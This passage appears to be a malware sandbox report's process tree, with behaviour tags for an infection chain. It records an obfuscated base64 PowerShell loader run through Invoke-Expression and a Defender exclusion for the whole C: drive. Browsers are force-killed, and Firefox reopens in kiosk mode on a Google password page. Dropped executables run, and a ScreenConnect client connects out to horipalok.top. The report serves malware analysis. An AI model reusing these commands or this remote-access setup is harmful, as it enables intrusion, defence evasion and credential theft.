4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5728
      - C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe"
        6⤵
        
        PID:7452
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67e8f4de3ad1d.vbs
        7⤵
        
        PID:7588
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
        8⤵
        
        PID:8056
      - C:\Users\Admin\AppData\Local\Temp\10381650101\32617d049f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381650101\32617d049f.exe"
        6⤵
        
        PID:8220
      - C:\Users\Admin\AppData\Local\Temp\10381660101\910fd24d86.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381660101\910fd24d86.exe"
        6⤵
        
        PID:9056
      - C:\Users\Admin\AppData\Local\Temp\10381670101\322979be02.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381670101\322979be02.exe"
        6⤵
        
        PID:6820
      - C:\Users\Admin\AppData\Local\Temp\10381680101\da257bafc6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381680101\da257bafc6.exe"
        6⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4836
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:7140
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:2592
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4360
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4916
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:5228
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:7436
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {a33a0606-2c95-458f-af68-59bda276c450} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:5824
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {9af0e8b0-8167-416c-ad64-dc06e42d3609} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:464
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3648 -prefsLen 25164 -prefMapHandle 3652 -prefMapSize 270279 -jsInitHandle 3656 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3664 -initialChannelId {45898c99-2509-4e18-b9d4-01cce1867385} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:8332
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3832 -prefsLen 27276 -prefMapHandle 3836 -prefMapSize 270279 -ipcHandle 3856 -initialChannelId {e071f18f-0e97-447f-b142-ef212ef41167} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:8392
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4484 -prefsLen 34775 -prefMapHandle 4488 -prefMapSize 270279 -jsInitHandle 4472 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4512 -initialChannelId {d9cb9f05-b8e3-43c5-b54d-a91b684970ad} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:8724
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4968 -prefsLen 34824 -prefMapHandle 4972 -prefMapSize 270279 -ipcHandle 4980 -initialChannelId {bac4e024-09dd-49a3-9e77-1acf93cab59d} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:8324
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5304 -prefsLen 32952 -prefMapHandle 5308 -prefMapSize 270279 -jsInitHandle 5312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5320 -initialChannelId {6047797e-2db3-4004-ad76-79e2b19ca727} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:11888
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5508 -prefsLen 32952 -prefMapHandle 5512 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5520 -initialChannelId {6699648d-2ffc-44a4-a2ff-b032e1b2a253} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:11936
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5692 -prefsLen 32952 -prefMapHandle 5696 -prefMapSize 270279 -jsInitHandle 5700 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {6268716d-06d8-46c4-a73e-98c032303574} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:11992
      - C:\Users\Admin\AppData\Local\Temp\10381690101\9852250675.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381690101\9852250675.exe"
        6⤵
        
        PID:9164
      - C:\Users\Admin\AppData\Local\Temp\10381700101\a012631816.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381700101\a012631816.exe"
        6⤵
        
        PID:11908
      - C:\Users\Admin\AppData\Local\Temp\10381710101\d467329ed2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381710101\d467329ed2.exe"
        6⤵
        
        PID:4760
      - C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe"
        6⤵
        
        PID:7432
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe"
        7⤵
        
        PID:7816
      - C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe"
        6⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe"
        7⤵
        
        PID:9996

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3520

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8DAD191259C6861A3AF4E4CBE039C0D6 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5040
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIA9A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240651000 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4232
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4272
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 27D60B54332FC397D92376AAF0B90687
  2⤵
  PID:392
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9D0F7E8165D39D620A557DD5BA8A3E10 E Global\MSI0000
  2⤵
  PID:4408

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4148

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=17fa24ad-b218-4f2b-bc59-37df47dd924f&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
1⤵
PID:5460
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "1d6264b1-1ea5-4ed4-931b-5943b4cdebe3" "User"
  2⤵
  PID:1672
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "117f9f4c-f663-4669-a9e9-2242ededa4fc" "System"
  2⤵
  PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:7568
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:7952

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:8300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{0151554c-1b0e-4271-a505-48ece38b8685}\26409982-ecd6-4488-8672-81e093803f43.cmd"
1⤵
PID:9984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11064
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11488
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12120
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6900
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7188
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7732
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9012
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9964
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10628
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12668
- C:\Windows\system32\PING.EXE
